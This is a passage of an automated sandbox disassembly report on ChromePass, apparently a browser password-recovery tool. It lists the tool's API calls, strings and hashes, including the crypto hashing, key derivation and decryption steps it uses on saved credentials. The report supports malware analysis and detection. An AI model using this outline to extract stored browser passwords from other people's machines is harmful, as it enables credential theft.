                                        • Opcode Fuzzy Hash: 5a47a92697ceca4bda858669ce9da63cc47876be752c494a90490a2f72832735
                                        • Instruction Fuzzy Hash: D141C772604601AFCB30AF25C48166AB7A5FF44314B14893FE459E7F91D738EC498799
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: CloseHandleSleep
                                        • String ID:
                                        • API String ID: 252777609-0
                                        • Opcode ID: 0b5221217f3981b554959319653820e88273f99e98a163d5125fd54341fc2777
                                        • Instruction ID: da62a678dcbff2ab1d74d28a03ee2a830e5dbcfe626ce62bc62febd1661457e7
                                        • Opcode Fuzzy Hash: 0b5221217f3981b554959319653820e88273f99e98a163d5125fd54341fc2777
                                        • Instruction Fuzzy Hash: 37E0CD37264515DFC6105BB8DCD0A6B7399DF45A74714433AE262D61F0C67498024694
                                        APIs
                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 00421EB4
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: CriticalLeaveSection
                                        • String ID:
                                        • API String ID: 3988221542-0
                                        • Opcode ID: 6c20effda86d1a598f4add828d0d3b9d7382dcea4e18e5554278ae06f534a34d
                                        • Instruction ID: 359b2e2d163342241aca88b0ac67ebd774a7a70df911bbc44683ad615efa9f38
                                        • Opcode Fuzzy Hash: 6c20effda86d1a598f4add828d0d3b9d7382dcea4e18e5554278ae06f534a34d
                                        • Instruction Fuzzy Hash: 04E06576704221AFC710AF56EC05A0AB7A4EF94361F11452AFA00D7371D735EC1697D9
                                        APIs
                                        • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 0040A670
                                          • Part of subcall function 0040A556: memset.MSVCRT ref: 0040A575
                                          • Part of subcall function 0040A556: _itow.MSVCRT ref: 0040A58C
                                          • Part of subcall function 0040A556: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 0040A59B
                                        Similarity
                                        • API ID: PrivateProfile$StringWrite_itowmemset
                                        • String ID:
                                        • API String ID: 4232544981-0
                                        APIs
                                        • WriteFile.KERNELBASE(?,?,00000000,00000000,00000000,?,?,004022C7,?,?,00000000,?), ref: 00405256
                                        Similarity
                                        • API ID: FileWrite
                                        • String ID:
                                        • API String ID: 3934441357-0
                                        APIs
                                        • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,00407BBD,?), ref: 00404869
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        APIs
                                        • EnumResourceNamesW.KERNELBASE(?,?,Function_0000A849,00000000), ref: 0040A8DE
                                        Similarity
                                        • API ID: EnumNamesResource
                                        • String ID:
                                        • API String ID: 3334572018-0
                                        APIs
                                        • GetFileAttributesW.KERNELBASE(?,00402F21,?), ref: 00404B87
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        APIs
                                          • Part of subcall function 0040B358: memset.MSVCRT ref: 0040B371
                                        • memset.MSVCRT ref: 00410C3D
                                        Similarity
                                        • API ID: memset
                                        • String ID:
                                        • API String ID: 2221118986-0
                                        APIs
                                          • Part of subcall function 0040543B: free.MSVCRT ref: 0040543E
                                          • Part of subcall function 0040543B: free.MSVCRT ref: 00405446
                                        • free.MSVCRT ref: 004056AF
                                          • Part of subcall function 0040551C: free.MSVCRT ref: 0040552B
                                          • Part of subcall function 00404AE7: malloc.MSVCRT ref: 00404B03
                                          • Part of subcall function 00404AE7: memcpy.MSVCRT(00000000,00000000,?,00000000,?,004027D0,00000002,?,?,?,00401DD0,?), ref: 00404B1B
                                          • Part of subcall function 00404AE7: free.MSVCRT ref: 00404B24
                                        Similarity
                                        • API ID: free$mallocmemcpy
                                        • String ID:
                                        • API String ID: 3401966785-0
                                        APIs
                                        Similarity
                                        • API ID: free
                                        • String ID:
                                        • API String ID: 1294909896-0
                                        APIs
                                        • memcmp.MSVCRT(?,00000414,00000005,00000000,00000000,000000FF), ref: 00403198
                                        • memset.MSVCRT ref: 004031B9
                                        • memset.MSVCRT ref: 004031D5
                                          • Part of subcall function 00402D84: memset.MSVCRT ref: 00402DA2
                                          • Part of subcall function 00402D84: _snwprintf.MSVCRT ref: 00402E09
                                          • Part of subcall function 00402D84: wcslen.MSVCRT ref: 00402E56
                                          • Part of subcall function 00402D84: wcslen.MSVCRT ref: 00402E62
                                        • memset.MSVCRT ref: 0040320E
                                        • memset.MSVCRT ref: 0040322A
                                          • Part of subcall function 00404AB9: wcslen.MSVCRT ref: 00404AC0
                                          • Part of subcall function 00404AB9: memcpy.MSVCRT(?,00000143,00000143,00000143,00402E53,-0000040E), ref: 00404AD6
                                          • Part of subcall function 00402C80: wcslen.MSVCRT ref: 00402CA6
                                          • Part of subcall function 00402C80: wcslen.MSVCRT ref: 00402CBD
                                          • Part of subcall function 00402F70: GetFileSize.KERNEL32(00000000,00000000,?,?,00000414), ref: 00402F97
                                          • Part of subcall function 00402F70: memset.MSVCRT ref: 00402FBF
                                          • Part of subcall function 00402F70: CloseHandle.KERNEL32(00000000), ref: 00402FD8
                                          • Part of subcall function 00402F70: memset.MSVCRT ref: 00402FF7
                                          • Part of subcall function 00402F70: memcpy.MSVCRT(?,?,00000010,?,00000000,00000027), ref: 00403009
                                          • Part of subcall function 00402F70: memset.MSVCRT ref: 00403059
                                          • Part of subcall function 00402F70: memset.MSVCRT ref: 0040306D
                                          • Part of subcall function 00402F70: memcpy.MSVCRT(?,?,00000300,?,?,?,?,?,?), ref: 00403099
                                          • Part of subcall function 00402A96: CryptHashData.ADVAPI32(?,00000414,?,00000000,?,?,?,?,00000001,?,00403303,00000000,00000470,?,00000000,?), ref: 00402AC7
                                          • Part of subcall function 00402A96: CryptHashData.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000001,?,00403303,00000000,00000470,?,00000000,?), ref: 00402AD3
                                          • Part of subcall function 00402A96: CryptGetHashParam.ADVAPI32(?,00000002,00000414,00000414,00000000,00008004,?,00403303,00000000,00000470,?,00000000,?,00401AA1,00000000,00000414), ref: 00402AEF
                                        • memcmp.MSVCRT(F4458D15,00000000,00000014,00000000,00000470,?,00000000,?,00401AA1,00000000,00000414,00000000,?,?,00000414,?), ref: 00403311
                                        • LocalAlloc.KERNEL32(00000040,00000001,?,?,?,?,?,?,?,?,?), ref: 00403322
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,000000FF), ref: 0040338A
                                          • Part of subcall function 00402AFB: CryptHashData.ADVAPI32(00000000,00000000,?,00000000,00000000,K3@,K3@,00000001,00000000,?,0040334B,00000000,00000450,00000000,?,00000000), ref: 00402B28
                                          • Part of subcall function 00402AFB: CryptDeriveKey.ADVAPI32(00000001,00006603,00000000,00A80004,?,00000000,K3@,K3@,00000001,00000000,?,0040334B,00000000,00000450,00000000,?), ref: 00402B40
                                          • Part of subcall function 00402AFB: CryptDestroyHash.ADVAPI32(00000000,?,0040334B,00000000,00000450,00000000,?,00000000,?,?,?,?,?,?), ref: 00402B4B
                                        • memcpy.MSVCRT(00000000,000003A4,00000000,00000000,00000450,00000000,?,00000000,?,?,?,?,?,?), ref: 00403353
                                        • CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000,?,00000000,00000450,00000000,?,00000000,?,?,?,?), ref: 00403369
                                        • LocalFree.KERNEL32(00000000,?,00000000,00000450,00000000,?,00000000,?,?,?,?,?,?), ref: 00403384
                                        Similarity
                                        • API ID: memset$Crypt$Hashwcslen$memcpy$Data$Localmemcmp$AllocCloseDecryptDeriveDestroyErrorFileFreeHandleLastParamSize_snwprintf
                                        • String ID:
                                        • API String ID: 719044479-0
                                        APIs
                                        • EmptyClipboard.USER32 ref: 004049FF
                                          • Part of subcall function 0040483E: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,00402F89,00000414,?,?,00000414), ref: 00404850
                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 00404A1C
                                        • GlobalAlloc.KERNEL32(00002000,00000002), ref: 00404A2D
                                        • GlobalLock.KERNEL32(00000000), ref: 00404A3A
                                        • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00404A4D
                                        • GlobalUnlock.KERNEL32(00000000), ref: 00404A5F
                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00404A68
                                        • GetLastError.KERNEL32 ref: 00404A70
                                        • CloseHandle.KERNEL32(?), ref: 00404A7C
                                        • GetLastError.KERNEL32 ref: 00404A87
                                        • CloseClipboard.USER32 ref: 00404A90
                                        Similarity
                                        • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                        • String ID:
                                        • API String ID: 3604893535-0
                                        APIs
                                          • Part of subcall function 004027EF: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00402C8F,?,00403271,00000414,?,?,?,?,?,?,?), ref: 004027FF
                                        • CryptCreateHash.ADVAPI32(00000000,00008004,00000000,00000000,?,?,?,?,?,?,?,00402A6E,?,00000000,?,?), ref: 0040294C
                                        • CryptHashData.ADVAPI32(00000002,n*@,00000040,00000000,?,?,?,?,?,?,00402A6E,?,00000000,?,?), ref: 00402965
                                        • CryptHashData.ADVAPI32(00000002,00000000,?,00000000,?,?,?,?,?,?,00402A6E,?,00000000,?,?), ref: 00402975
                                        • CryptGetHashParam.ADVAPI32(00000002,00000002,?,00000000,00000000,00008004,?,?,?,?,?,?,00402A6E,?,00000000,?), ref: 00402991
                                        • CryptDestroyHash.ADVAPI32(00000002,?,?,?,?,?,?,00402A6E,?,00000000,?,?), ref: 0040299D
                                        Strings
                                        Similarity
                                        • API ID: Crypt$Hash$Data$AcquireContextCreateDestroyParam
                                        • String ID: n*@$n*@
                                        • API String ID: 1860763720-3431974180
                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: strlen
                                        • String ID: %s-mj%08X
                                        • API String ID: 39653677-77246884
                                        APIs
                                          • Part of subcall function 004027EF: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00402C8F,?,00403271,00000414,?,?,?,?,?,?,?), ref: 004027FF
                                        • CryptCreateHash.ADVAPI32(?,00008004,00000000,00000000,?,?,00000414,?,?,00402CBA,?,00000000,00000000,?), ref: 004028DD
                                        • CryptHashData.ADVAPI32(?,00000000,00000000,00000000,?,00402CBA,?,00000000,00000000,?), ref: 004028F1
                                        • CryptGetHashParam.ADVAPI32(?,00000002,?,00000000,00000000,00008004,?,00402CBA,?,00000000,00000000,?), ref: 00402911
                                        • CryptDestroyHash.ADVAPI32(?,?,00402CBA,?,00000000,00000000,?), ref: 0040291C
                                        Similarity
                                        • API ID: Crypt$Hash$AcquireContextCreateDataDestroyParam
                                        • String ID:
                                        • API String ID: 1643522540-0
                                        APIs
                                        • GetDlgItem.USER32(?,000003EC), ref: 004010F7
                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 00401109
                                        • GetDlgItem.USER32(?,000003EE), ref: 0040113F
                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 0040114C
                                        • GetDlgItem.USER32(?,000003EC), ref: 0040117A
                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 0040118C
                                        • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 00401195
                                        • LoadCursorW.USER32(00000000,00000067), ref: 0040119E
                                        • SetCursor.USER32(00000000,?,?), ref: 004011A5
                                        • GetDlgItem.USER32(?,000003EE), ref: 004011C6
                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 004011D3
                                        • GetDlgItem.USER32(?,000003EC), ref: 004011ED
                                        • SetBkMode.GDI32(?,00000001), ref: 004011F9
                                        • SetTextColor.GDI32(?,00C00000), ref: 00401207
                                        • GetSysColorBrush.USER32(0000000F), ref: 0040120F
                                        • GetDlgItem.USER32(?,000003EE), ref: 00401230
                                        • EndDialog.USER32(?,00000001), ref: 0040125B
                                        • DeleteObject.GDI32(?), ref: 00401267
                                        • GetDlgItem.USER32(?,000003ED), ref: 0040128C
                                        • ShowWindow.USER32(00000000), ref: 00401295
                                        • GetDlgItem.USER32(?,000003EE), ref: 004012A1
                                        • ShowWindow.USER32(00000000), ref: 004012A4
                                        • SetDlgItemTextW.USER32(?,000003EE,00435A10), ref: 004012B5
                                        • SetWindowTextW.USER32(?,ChromePass), ref: 004012C3
                                        • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004012DB
                                        • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004012EC
                                        Similarity
                                        • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                        • String ID: ChromePass
                                        • API String ID: 829165378-1216945463
                                        APIs
                                        • EndDialog.USER32(?,?), ref: 004099F2
                                        • GetDlgItem.USER32(?,000003EA), ref: 00409A0A
                                        • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00409A28
                                        • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00409A34
                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00409A3C
                                        • memset.MSVCRT ref: 00409A63
                                        • memset.MSVCRT ref: 00409A85
                                        • memset.MSVCRT ref: 00409A9E
                                        • memset.MSVCRT ref: 00409AB2
                                        • memset.MSVCRT ref: 00409ACC
                                        • memset.MSVCRT ref: 00409AE1
                                        • GetCurrentProcess.KERNEL32 ref: 00409AE9
                                        • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 00409B0C
                                        • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 00409B3E
                                        • memset.MSVCRT ref: 00409B91
                                        • GetCurrentProcessId.KERNEL32 ref: 00409B9F
                                        • memcpy.MSVCRT(?,004351A0,0000021C), ref: 00409BCD
                                        • wcscpy.MSVCRT ref: 00409BF0
                                        • _snwprintf.MSVCRT ref: 00409C5F
                                        • SetDlgItemTextW.USER32(?,000003EA,?), ref: 00409C77
                                        • GetDlgItem.USER32(?,000003EA), ref: 00409C81
                                        • SetFocus.USER32(00000000), ref: 00409C88
                                        Strings
                                        • {Unknown}, xrefs: 00409A77
                                        • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00409C54
                                        Similarity
                                        • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                        • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                        • API String ID: 4111938811-1819279800
                                        APIs
                                        • GetDlgItem.USER32(?,000003E9), ref: 0040A194
                                        • GetDlgItem.USER32(?,000003E8), ref: 0040A1A0
                                        • GetWindowRect.USER32(00000000,?), ref: 0040A1E2
                                        • GetWindowRect.USER32(?,?), ref: 0040A1ED
                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0040A201
                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0040A20F
                                        • 73A1A570.USER32(?,?,?), ref: 0040A248
                                        • wcslen.MSVCRT ref: 0040A288
                                        • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0040A299
                                        • _snwprintf.MSVCRT ref: 0040A3A9
                                        • SetWindowTextW.USER32(?,?), ref: 0040A3BD
                                        • SetWindowTextW.USER32(?,00000000), ref: 0040A3DB
                                        • GetDlgItem.USER32(?,00000001), ref: 0040A411
                                        • GetWindowRect.USER32(00000000,?), ref: 0040A421
                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0040A42F
                                        • GetClientRect.USER32(?,?), ref: 0040A446
                                        • GetWindowRect.USER32(?,?), ref: 0040A450
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0040A496
                                        • GetClientRect.USER32(?,?), ref: 0040A4A0
                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0040A4D8
                                        Similarity
                                        • API ID: Window$Rect$ItemPointsText$Client$A570ExtentPoint32_snwprintfwcslen
                                        • String ID: %s:$EDIT$STATIC
                                        • API String ID: 842022892-3046471546
                                        APIs
                                        • memset.MSVCRT ref: 00408045
                                        • SHGetFileInfoW.SHELL32(0042C47C,00000000,?,000002B4,00004001), ref: 00408062
                                        • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0040807C
                                        • SendMessageW.USER32(?,00001003,00000001,?), ref: 004080AE
                                        • SendMessageW.USER32(?,00001003,00000000,?), ref: 004080E8
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00408105
                                        • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 0040811C
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00408124
                                        • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00408137
                                        • GetSysColor.USER32(0000000F), ref: 0040814B
                                        • DeleteObject.GDI32(?), ref: 0040817F
                                        • DeleteObject.GDI32(00000000), ref: 00408182
                                        • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004081A0
                                        Similarity
                                        • API ID: MessageSend$DeleteHandleImageLoadModuleObject$ColorFileInfomemset
                                        • String ID:
                                        • API String ID: 3623935593-0
                                        APIs
                                        • SetBkMode.GDI32(?,00000001), ref: 004092F3
                                        • SetTextColor.GDI32(?,00FF0000), ref: 00409301
                                        • SelectObject.GDI32(?,?), ref: 00409316
                                        • DrawTextExW.USER32(?,?,000000FF,?,00000004,?), ref: 0040934A
                                        • SelectObject.GDI32(00000014,00000005), ref: 00409356
                                          • Part of subcall function 0040910A: GetCursorPos.USER32(?), ref: 00409117
                                          • Part of subcall function 0040910A: GetSubMenu.USER32(?,00000000), ref: 00409125
                                          • Part of subcall function 0040910A: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 00409153
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00409371
                                        • LoadCursorW.USER32(00000000,00000067), ref: 0040937A
                                        • SetCursor.USER32(00000000), ref: 00409381
                                        • PostMessageW.USER32(?,0000041C,00000000,00000000), ref: 004093A3
                                        • SetFocus.USER32(?), ref: 004093D8
                                        • SetFocus.USER32(?), ref: 0040943C
                                        Similarity
                                        • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawHandleLoadMessageModeModulePopupPostTrack
                                        • String ID:
                                        • API String ID: 3230168590-0
                                        APIs
                                        • memcpy.MSVCRT(?,00000000,00000044), ref: 0041A4EF
                                        Similarity
                                        • API ID: memcpy
                                        • String ID: %s: %s$%s: %s.%s$%s: %s.%s.%s$ambiguous column name$misuse of aliased aggregate %s$new$no such column$old
                                        • API String ID: 3510742995-918941476
                                        APIs
                                          • Part of subcall function 00406714: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040693E), ref: 00406720
                                          • Part of subcall function 00406714: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040693E), ref: 0040672E
                                          • Part of subcall function 00406714: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040693E), ref: 0040673F
                                          • Part of subcall function 00406714: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040693E), ref: 00406756
                                          • Part of subcall function 00406714: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040693E), ref: 0040675F
                                        • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00406965
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000), ref: 00406981
                                        • memcpy.MSVCRT(?,@JC,00000014), ref: 004069A6
                                        • memcpy.MSVCRT(?,@JC,00000014,?,@JC,00000014), ref: 004069BA
                                        • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00406A3D
                                        • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000), ref: 00406A47
                                        • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00406A7F
                                          • Part of subcall function 004059FD: GetModuleHandleW.KERNEL32(00000000,?,?,00401F52,?,?), ref: 00405A3C
                                          • Part of subcall function 004059FD: LoadStringW.USER32(00000000,00000519,00000FFF), ref: 00405AD5
                                          • Part of subcall function 004059FD: memcpy.MSVCRT(00000000,00000002,?,?,00401F52,?,?), ref: 00405B15
                                          • Part of subcall function 004059FD: wcscpy.MSVCRT ref: 00405A7E
                                          • Part of subcall function 004059FD: wcslen.MSVCRT ref: 00405A9C
                                          • Part of subcall function 004059FD: GetModuleHandleW.KERNEL32(00000000), ref: 00405AAA
                                        Similarity
                                        • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                        • String ID: @JC$d
                                        • API String ID: 1140211610-2744344691
                                        APIs
                                        • memcpy.MSVCRT(?,&quot;,0000000C,?,?,00000000,004078CC,?,?), ref: 0040AB1C
                                        • memcpy.MSVCRT(?,&amp;,0000000A,?,?,00000000,004078CC,?,?), ref: 0040AB48
                                        • memcpy.MSVCRT(?,&lt;,00000008,?,?,00000000,004078CC,?,?), ref: 0040AB62
                                        Similarity
                                        • API ID: memcpy
                                        • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                        • API String ID: 3510742995-3273207271
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00401F52,?,?), ref: 00405A3C
                                        • wcscpy.MSVCRT ref: 00405A7E
                                          • Part of subcall function 00405EEF: memset.MSVCRT ref: 00405F02
                                          • Part of subcall function 00405EEF: _itow.MSVCRT ref: 00405F10
                                        • wcslen.MSVCRT ref: 00405A9C
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00405AAA
                                        • LoadStringW.USER32(00000000,00000519,00000FFF), ref: 00405AD5
                                        • memcpy.MSVCRT(00000000,00000002,?,?,00401F52,?,?), ref: 00405B15
                                          • Part of subcall function 0040595B: ??2@YAPAXI@Z.MSVCRT(00000000,00405A0B,00401F52,?,?), ref: 00405995
                                          • Part of subcall function 0040595B: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00405A0B,00401F52,?,?), ref: 004059B3
                                          • Part of subcall function 0040595B: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00405A0B,00401F52,?,?), ref: 004059D1
                                          • Part of subcall function 0040595B: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,00405A0B,00401F52,?,?), ref: 004059EF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                        • String ID: strings
                                        • API String ID: 3166385802-3030018805
                                        • Opcode ID: 5a57db18c3fcdba6add60d60e7aa980d406878a611af4cde56f8485491c562c9
                                        • Instruction ID: b57a637b8855130ffa1a7504adc270446ba2cec8e5bfd8050038c7f01de010dc
                                        • Opcode Fuzzy Hash: 5a57db18c3fcdba6add60d60e7aa980d406878a611af4cde56f8485491c562c9
                                        • Instruction Fuzzy Hash: FD413971600E019FCB18EB19EC95E2B33A5F784309750713AE812A72A1DF39AC52DF5C
                                        APIs
                                        • memset.MSVCRT ref: 0040617E
                                        • GetDlgCtrlID.USER32(?), ref: 00406189
                                        • GetWindowTextW.USER32(?,?,00001000), ref: 004061A0
                                        • memset.MSVCRT ref: 004061C7
                                        • GetClassNameW.USER32(?,?,000000FF), ref: 004061DE
                                        • _wcsicmp.MSVCRT ref: 004061F0
                                          • Part of subcall function 00406031: memset.MSVCRT ref: 00406044
                                          • Part of subcall function 00406031: _itow.MSVCRT ref: 00406052
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                        • String ID: sysdatetimepick32
                                        • API String ID: 1028950076-4169760276
                                        • Opcode ID: 89e785f6619a180bef2736402fca55b64736eb51bd0a17ce5aa6f62226469910
                                        • Instruction ID: c9c998f0b0d1e52276907cba2e903802b90230db4748a45949daaeea23d83061
                                        • Opcode Fuzzy Hash: 89e785f6619a180bef2736402fca55b64736eb51bd0a17ce5aa6f62226469910
                                        • Instruction Fuzzy Hash: 8C11AB325002297BE724E791DC89A9F776DEF04350F4040A6F519D1193DB344A91CB59
                                        APIs
                                        • GetDlgItem.USER32(?,000003E9), ref: 004042F5
                                        • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 0040430E
                                        • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 0040431B
                                        • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00404327
                                        • memset.MSVCRT ref: 0040438B
                                        • SendMessageW.USER32(?,0000105F,?,?), ref: 004043C0
                                        • SetFocus.USER32(?), ref: 00404444
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: MessageSend$FocusItemmemset
                                        • String ID:
                                        • API String ID: 4281309102-0
                                        • Opcode ID: c369cc2eda86e2299338a834ecd43e7d198953d8cec81144db89381f78cfc048
                                        • Instruction ID: 55441b7852df1a309b124f95804d97ee0adb4dd075dc708f7d4400b2906616ed
                                        • Opcode Fuzzy Hash: c369cc2eda86e2299338a834ecd43e7d198953d8cec81144db89381f78cfc048
                                        • Instruction Fuzzy Hash: 31415171D00219AFDB209F95CC85DAFBBB9FF84704F0080AAF914B62A1D7759A41CF64
                                        APIs
                                        • LoadMenuW.USER32(?,?), ref: 0040623E
                                          • Part of subcall function 00406068: GetMenuItemCount.USER32(?), ref: 0040607E
                                          • Part of subcall function 00406068: memset.MSVCRT ref: 0040609D
                                          • Part of subcall function 00406068: GetMenuItemInfoW.USER32 ref: 004060D9
                                          • Part of subcall function 00406068: wcschr.MSVCRT ref: 004060F1
                                        • DestroyMenu.USER32(00000000), ref: 0040625C
                                        • CreateDialogParamW.USER32(?,?,00000000,00406213,00000000), ref: 004062AB
                                        • memset.MSVCRT ref: 004062C7
                                        • GetWindowTextW.USER32(00000000,?,00001000), ref: 004062DC
                                          • Part of subcall function 00405E9F: _snwprintf.MSVCRT ref: 00405EC4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
